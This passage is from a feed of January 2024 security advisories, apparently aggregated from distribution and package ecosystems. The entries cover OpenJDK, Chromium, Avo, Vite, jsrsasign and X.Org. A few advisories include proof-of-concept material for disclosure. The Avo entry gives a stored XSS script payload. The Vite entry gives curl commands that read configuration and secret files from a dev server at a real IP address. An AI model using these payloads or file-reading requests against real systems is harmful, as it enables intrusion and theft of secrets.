Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 2.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).CVE-2024-20921: Loop optimizations are not correct when induction variable overflowsCVE-2024-20919: With carefully crafted custom bytecodes, arbitrary unverified bytecodes could be executed.CVE-2024-20918: A vulnerability that allows an attacker to execute arbitrary java code from the javascript engine even though the option "--no-java" was set.	https://secdb.nttzen.cloud/security-advisory/amazonlinux/ALAS2-2024-2415
17.01.2024 02:00:00	cisa	[CISA-2024:0117] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (high)	CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0117
17.01.2024 02:00:00	cpan	[CPANSA-Spreadsheet-ParseXLSX-2024-02] Spreadsheet-ParseXLSX vulnerability	In default configuration of Spreadsheet::ParseXLSX, whenever we call Spreadsheet::ParseXLSX->new()->parse('user_input_file.xlsx'), we'd be vulnerable for XXE vulnerability if the XLSX file that we are parsing is from user input.	https://secdb.nttzen.cloud/security-advisory/cpan/CPANSA-Spreadsheet-ParseXLSX-2024-02
17.01.2024 02:00:00	debian	[DSA-5602-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5602-1
17.01.2024 02:00:00	gentoo	[GLSA-202401-25] OpenJDK: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in OpenJDK, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-25
17.01.2024 02:00:00	oraclelinux	[ELSA-2024-0152] .NET 8.0 security update (important)	[8.0.101-1.0.1]- Update to .NET SDK 8.0.101 and Runtime 8.0.1	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0152
17.01.2024 02:00:00	redhat	[RHSA-2024:0279] gstreamer-plugins-bad-free security update (important)	GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer-plugins-bad-free package contains a collection of plug-ins for GStreamer.Security Fix(es):* gstreamer: MXF demuxer use-after-free vulnerability (CVE-2023-44446)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0279
17.01.2024 23:03:44	rustsec	[RUSTSEC-2024-0003] Resource exhaustion vulnerability in h2 may lead to Denial of Service (DoS)	An attacker with an HTTP/2 connection to an affected endpoint can send a steady stream of invalid frames to force thegeneration of reset frames on the victim endpoint.By closing their recv window, the attacker could then force these resets to be queued in an unbounded fashion,resulting in Out Of Memory (OOM) and high CPU usage.This fix is corrected in [hyperium/h2#737](https://github.com/hyperium/h2/pull/737), which limits the total number ofinternal error resets emitted by default before the connection is closed.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0003
17.01.2024 02:00:00	redhat	[RHSA-2024:0223] java-1.8.0-openjdk security and bug fix update (important)	The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.Security Fix(es):* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)* OpenJDK: arbitrary Java code execution in Nashorn (8314284) (CVE-2024-20926)* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* In the previous release in October 2023 (8u392), the RPMs were changed to use Provides for java, jre, java-headless, jre-headless, java-devel and java-sdk which included the full RPM version. This prevented the Provides being used to resolve a dependency on Java 1.8.0 (for example, "Requires: java-headless 1:1.8.0"). This change has now been reverted to the old "1:1.8.0" value. (RHEL-19630)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0223
17.01.2024 02:00:00	redhat	[RHSA-2024:0232] java-11-openjdk security update (important)	The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.Security Fix(es):* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)* OpenJDK: arbitrary Java code execution in Nashorn (8314284) (CVE-2024-20926)* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0232
17.01.2024 02:00:00	redhat	[RHSA-2024:0248] java-21-openjdk security update (important)	The java-21-openjdk packages provide the OpenJDK 21 Java Runtime Environment and the OpenJDK 21 Java Software Development Kit.Security Fix(es):* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0248
17.01.2024 02:00:00	redhat	[RHSA-2024:0265] java-1.8.0-openjdk security and bug fix update (important)	The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.Security Fix(es):* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)* OpenJDK: arbitrary Java code execution in Nashorn (8314284) (CVE-2024-20926)* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* In the previous release in October 2023 (8u392), the RPMs on RHEL 8 were changed to use Provides for java, jre, java-headless, jre-headless, java-devel and java-sdk which included the full RPM version. This prevented the Provides being used to resolve a dependency on Java 1.8.0 (for example, "Requires: java-headless 1:1.8.0"). This change has now been reverted to the old "1:1.8.0" value. (RHEL-19636, RHEL-19637)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0265
17.01.2024 02:00:00	redhat	[RHSA-2024:0267] java-17-openjdk security and bug fix update (important)	The java-17-openjdk packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit.Security Fix(es):* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)* OpenJDK: incorrect handling of ZIP files with duplicate entries (8276123) (CVE-2024-20932)* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* When Transparent Huge Pages (THP) are unconditionally enabled on a system, Java applications using many threads were found to have a large Resident Set Size (RSS). This was due to a race between the kernel transforming thread stack memory into huge pages and the Java Virtual Machine (JVM) shattering these pages into smaller ones when adding a guard page. This release resolves this issue by getting glibc to insert a guard page and prevent the creation of huge pages. (RHEL-13930, RHEL-13931, RHEL-13934, RHEL-13935)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0267
17.01.2024 02:00:00	redhat	[RHSA-2024:0249] java-21-openjdk security update (important)	The java-21-openjdk packages provide the OpenJDK 21 Java Runtime Environment and the OpenJDK 21 Java Software Development Kit.Security Fix(es):* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0249
17.01.2024 01:41:58	go	[GO-2024-2469] Kyberslash timing attack possible in github.com/kudelskisecurity/crystals-go		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2469
17.01.2024 00:15:42	alpinelinux	[ALPINE:CVE-2024-20952] openjdk17, openjdk21, openjdk11 vulnerability (high)	[From CVE-2024-20952] Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20952
17.01.2024 00:15:42	alpinelinux	[ALPINE:CVE-2024-20955] openjdk17 vulnerability (low)	[From CVE-2024-20955] Vulnerability in the Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Compiler). Supported versions that are affected are Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20955
17.01.2024 00:15:40	alpinelinux	[ALPINE:CVE-2024-20926] openjdk17, openjdk11 vulnerability (medium)	[From CVE-2024-20926] Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Scripting). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20926
17.01.2024 00:15:40	alpinelinux	[ALPINE:CVE-2024-20932] openjdk17 vulnerability (high)	[From CVE-2024-20932] Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 17.0.9; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 21.3.8 and 22.3.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20932
17.01.2024 00:15:39	alpinelinux	[ALPINE:CVE-2024-20918] openjdk21, openjdk17, openjdk11 vulnerability (high)	[From CVE-2024-20918] Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20918
16.01.2024 23:16:14	go	[GO-2024-2464] Remote command execution in github.com/0xJacky/Nginx-UI (high)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2464
16.01.2024 23:04:29	go	[GO-2024-2463] SQL injection in github.com/0xJacky/Nginx-UI (high)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2463
17.01.2024 12:35:23	almalinux	[ALSA-2024:0113] kernel security update (important)	kernel security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0113
18.01.2024 20:21:32	ubuntu	[USN-6590-1] Xerces-C++ vulnerabilities (high)	Several security issues were fixed in Xerces-C++.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6590-1
18.01.2024 19:55:52	ubuntu	[USN-6589-1] FileZilla vulnerability (medium)	FileZilla could be made to expose sensitive information over thenetwork.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6589-1
18.01.2024 18:15:08	alpinelinux	[ALPINE:CVE-2024-0408] xorg-server, xwayland vulnerability (medium)	[From CVE-2024-0408] A flaw was found in the X.Org server. The GLX PBuffer code does not call the XACE hook when creating the buffer, leaving it unlabeled. When the client issues another request to access that resource (as with a GetGeometry) or when it creates another resource that needs to access that buffer, such as a GC, the XSELINUX code will try to use an object that was never labeled and crash because the SID is NULL.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-0408
18.01.2024 18:15:08	alpinelinux	[ALPINE:CVE-2024-0409] xorg-server, xwayland vulnerability	[From CVE-2024-0409] A flaw was found in the X.Org server. The cursor code in both Xephyr and Xwayland uses the wrong type of private at creation. It uses the cursor bits type with the cursor as private, and when initiating the cursor, that overwrites the XSELINUX context.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-0409
18.01.2024 07:15:08	alpinelinux	[ALPINE:CVE-2023-6816] xwayland, xorg-server vulnerability (high)	[From CVE-2023-6816] A flaw was found in X.Org server. Both DeviceFocusEvent and the XIQueryPointer reply contain a bit for each logical button currently down. Buttons can be arbitrarily mapped to any value up to 255, but the X.Org Server was only allocating space for the device's particular number of buttons, leading to a heap overflow if a bigger value was used.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-6816
18.01.2024 02:00:00	cisa	[CISA-2024:0118] CISA Adds One Known Exploited Vulnerability to Catalog (critical)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0118
18.01.2024 02:00:00	oraclelinux	[ELSA-2024-12078] python3.11-cryptography security update (important)	[37.0.2-5.0.1]- Fix CVE-2023-49083: NULL-dereference when loading PKCS7 certificates [Orabug: 36143834]	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12078
18.01.2024 02:00:00	oraclelinux	[ELSA-2024-12079] python-cryptography security update (important)	[3.2.1-6.0.1]- Fix CVE-2023-49083: NULL-dereference when loading PKCS7 certificates [Orabug: 36143834]	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12079
18.01.2024 02:00:00	redhat	[RHSA-2024:0266] java-11-openjdk security update (important)	The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.Security Fix(es):* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)* OpenJDK: arbitrary Java code execution in Nashorn (8314284) (CVE-2024-20926)* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0266
18.01.2024 13:48:55	rubysec	[RUBYSEC:AVO-2024-22411] Cross-site scripting (XSS) in Action messages on Avo (medium)	Avo is a framework to create admin panels for Ruby on Rails apps.In Avo 3 pre12 any HTML inside text that is passed to `error` or`succeed` in an `Avo::BaseAction` subclass will be rendered directlywithout sanitization in the toast/notification that appears in theUI on Action completion. A malicious user could exploit thisvulnerability to trigger a cross site scripting attack on anunsuspecting user.This issue has been addressed in the 3.0.2 release of Avo. Usersare advised to upgrade.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:AVO-2024-22411
18.01.2024 15:40:17	rubysec	[RUBYSEC:AVO-2024-22191] avo vulnerable to stored cross-site scripting (XSS) in key_value field (high)	### SummaryA stored cross-site scripting (XSS) vulnerability was found inthe key_value field of Avo v3.2.3. This vulnerability could allowan attacker to execute arbitrary JavaScript code in the victim's browser.### DetailsThe value of the key_value is inserted directly into the HTML code.In the current version of Avo (possibly also older versions), thevalue is not properly sanitized before it is inserted into the HTML code.This vulnerability can be exploited by an attacker to inject maliciousJavaScript code into the key_value field. When a victim views the pagecontaining the malicious code, the code will be executed in their browser.In [avo/fields/common/key_value_component.html.erb](https://github.com/avo-hq/avo/blob/main/app/components/avo/fields/common/key_value_component.html.erb#L38C21-L38C33)the value is taken in lines 38 and 49 and seems to beinterpreted directly as html in lines 44 and 55.### PoC![POC](https://user-images.githubusercontent.com/26570201/295596307-5d4f563e-99c0-4981-a82e-fc42cfd902c5.gif)To reproduce the vulnerability, follow these steps:1. Edit an entry with a key_value field.2. Enter the following payload into the value field: ```POC\\\"> <script>alert('XSS in key_value' );</script> <strong>Outside-tag</strong```3. Save the entry.4. Go to the index page and click on the eye icon next to the entry.The malicious JavaScript code will be executed and an alert box will be displayed._On the show and edit page the alert seems not to pop up, but thestrong tag breaks out of the expected html tag_### ImpactThis vulnerability could be used to steal sensitive information fromvictims that could be used to hijack victims' accounts or redirectthem to malicious websites.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:AVO-2024-22191
18.01.2024 10:00:00	msrc	[MS:CVE-2024-0333] Chromium: CVE-2024-0333 Insufficient data validation in Extensions (medium)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0333
18.01.2024 10:00:00	msrc	[MS:CVE-2024-20675] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20675
18.01.2024 10:00:00	msrc	[MS:CVE-2024-20721] Adobe Systems Incorporated: CVE-2024-20721 Improper Input Validation Denial of Service Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20721
18.01.2024 10:00:00	msrc	[MS:CVE-2024-20709] Adobe Systems Incorporated: CVE-2024-20709 Javascript Implementation PDF Vulnerability (medium)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20709
18.01.2024 10:00:00	msrc	[MS:CVE-2024-21337] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21337
20.01.2024 00:07:48	npm	[NPM:GHSA-WG2X-RV86-MMPX] SPV Merkle proof malleability allows the maintainer to prove invalid transactions (high)	## SummaryBy publishing specially crafted transactions on the Bitcoin blockchain, the SPV maintainer can produce seemingly valid SPV proofs for fraudulent transactions.The issue was originally identified by Least Authority in the tBTC Bridge V2 Security Audit Report as _Issue B: Bitcoin SPV Merkle Proofs Can Be Faked_. A mitigation was believed to have been in place, but this turned out to contain an error, and the issue had not been effectively mitigated.### DetailsThis is achieved by creating a 64-byte transaction that the fraudulent transaction treats as a node in its merkle proof:The attacker creates the malicious transaction `E` and calculates an unusual but valid transaction `D`, so that the last 32 bytes of `D` are a part of the merkle proof of `E`:```D = foo \| hash256(E')E' = bar \| hash256(E)````foo` and `bar` are arbitrary 32-byte values selected to facilitate this attack.The attacker can then publish `D` and wait for it to be mined. A valid SPV proof for `D` can then be transformed into a proof for `E` by prepending `bar` and `foo` to the merkle proof, and changing the transaction index into one matching `E`'s implied position in the merkle tree.Calculating a suitable value for `E'` has been estimated to require between 2\^60 to 2\^81 operations. By contrast, the current Bitcoin hashrate is approximately 2\^69. Thus the cost of performing the requisite brute-force is at most similar to, or possibly up to 1,000,000 times lower than, the cost of mining 6 Bitcoin blocks at the current difficulty.### ImpactThe vulnerability does not enable the SPV maintainer to do anything they would not have been able to do otherwise. However, the ability to bypass the need to mine 6 blocks at the current difficulty makes abusing the SPV maintainer position significantly cheaper.### PatchesAdding the coinbase transaction and its merkle proof into the SPV proofs prevents this issue, by increasing the brute-force required to 2\^224. If the length of the coinbase proof matches the length of the transaction proof, and both proofs are valid for the same header, we can trust that the exploit has not been abused for the transaction.### WorkaroundsThe trusted SPV maintainer position prevents this issue### References[Weaknesses in Bitcoin’s Merkle Root Construction](https://lists.linuxfoundation.org/pipermail/bitcoin-dev/attachments/20190225/a27d8837/attachment-0001.pdf)[Leaf-Node weakness in Bitcoin Merkle Tree Design](https://bitslog.com/2018/06/09/leaf-node-weakness-in-bitcoin-merkle-tree-design/)[SPV proof verification vulnerable to potential (but expensive to exploit) Merkle tree problem \#192](https://github.com/summa-tx/bitcoin-spv/issues/192)[tBTC Bridge V2 Security Audit Report](https://leastauthority.com/static/publications/LeastAuthority_KeepNetwork_tBTC_Bridge_v2_Updated_Final_Audit_Report.pdf)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WG2X-RV86-MMPX
19.01.2024 23:58:48	npm	[NPM:GHSA-C24V-8RFC-W8VW] Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem (high)	### Summary[Vite dev server option](https://vitejs.dev/config/server-options.html#server-fs-deny) `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.This bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems.### PatchesFixed in vite@5.0.12, vite@4.5.2, vite@3.2.8, vite@2.9.17### DetailsSince `picomatch` defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible. See `picomatch` usage, where `nocase` is defaulted to `false`: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632By requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. ### PoCSetup1. Created vanilla Vite project using `npm create vite@latest` on a Standard Azure hosted Windows 10 instance. - `npm run dev -- --host 0.0.0.0` - Publicly accessible for the time being here: http://20.12.242.81:5173/ 2. Created dummy secret files, e.g. `custom.secret` and `production.pem`3. Populated `vite.config.js` with```javascriptexport default { server: { fs: { deny: ['.env', '.env.', '.{crt,pem}', 'custom.secret'] } } }```Reproduction1. `curl -s http://20.12.242.81:5173/@fs//` - Descriptive error page reveals absolute filesystem path to project root2. `curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js` - Discoverable configuration file reveals locations of secrets3. `curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT` - Secrets are directly accessible using case-augmented version of filenameProof![Screenshot 2024-01-19 022736](https://user-images.githubusercontent.com/907968/298020728-3a8d3c06-fcfd-4009-9182-e842f66a6ea5.png)### ImpactWho- Users with exposed dev servers on environments with case-insensitive filesystemsWhat- Files protected by `server.fs.deny` are both discoverable, and accessible	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-C24V-8RFC-W8VW
19.01.2024 17:06:08	npm	[NPM:GHSA-RH63-9QCF-83GF] Marvin Attack of RSA and RSAOAEP decryption in jsrsasign (high)	### ImpactRSA PKCS#1.5 or RSAOAEP ciphertexts may be decrypted by this Marvin attack vulnerability.### Patchesupdate to jsrsasign 11.0.0.### WorkaroundsFind and replace RSA and RSAOAEP decryption with other crypto library.### Referenceshttps://people.redhat.com/~hkario/marvin/https://github.com/kjur/jsrsasign/issues/598	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RH63-9QCF-83GF
18.01.2024 23:51:54	opensuse	[openSUSE-SU-2024:0025-1] Security update for chromium (critical)	Security update for chromium	https://secdb.nttzen.cloud/security-advisory/opensuse/openSUSE-SU-2024:0025-1
20.01.2024 16:46:26	almalinux	[ALSA-2024:0266] java-11-openjdk security update (important)	java-11-openjdk security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0266
20.01.2024 13:28:21	almalinux	[ALSA-2024:0248] java-21-openjdk security update (important)	java-21-openjdk security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0248
20.01.2024 16:52:20	almalinux	[ALSA-2024:0265] java-1.8.0-openjdk security and bug fix update (important)	java-1.8.0-openjdk security and bug fix update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0265
20.01.2024 16:58:06	almalinux	[ALSA-2024:0249] java-21-openjdk security update (important)	java-21-openjdk security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0249
20.01.2024 16:39:46	almalinux	[ALSA-2024:0267] java-17-openjdk security and bug fix update (important)	java-17-openjdk security and bug fix update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0267
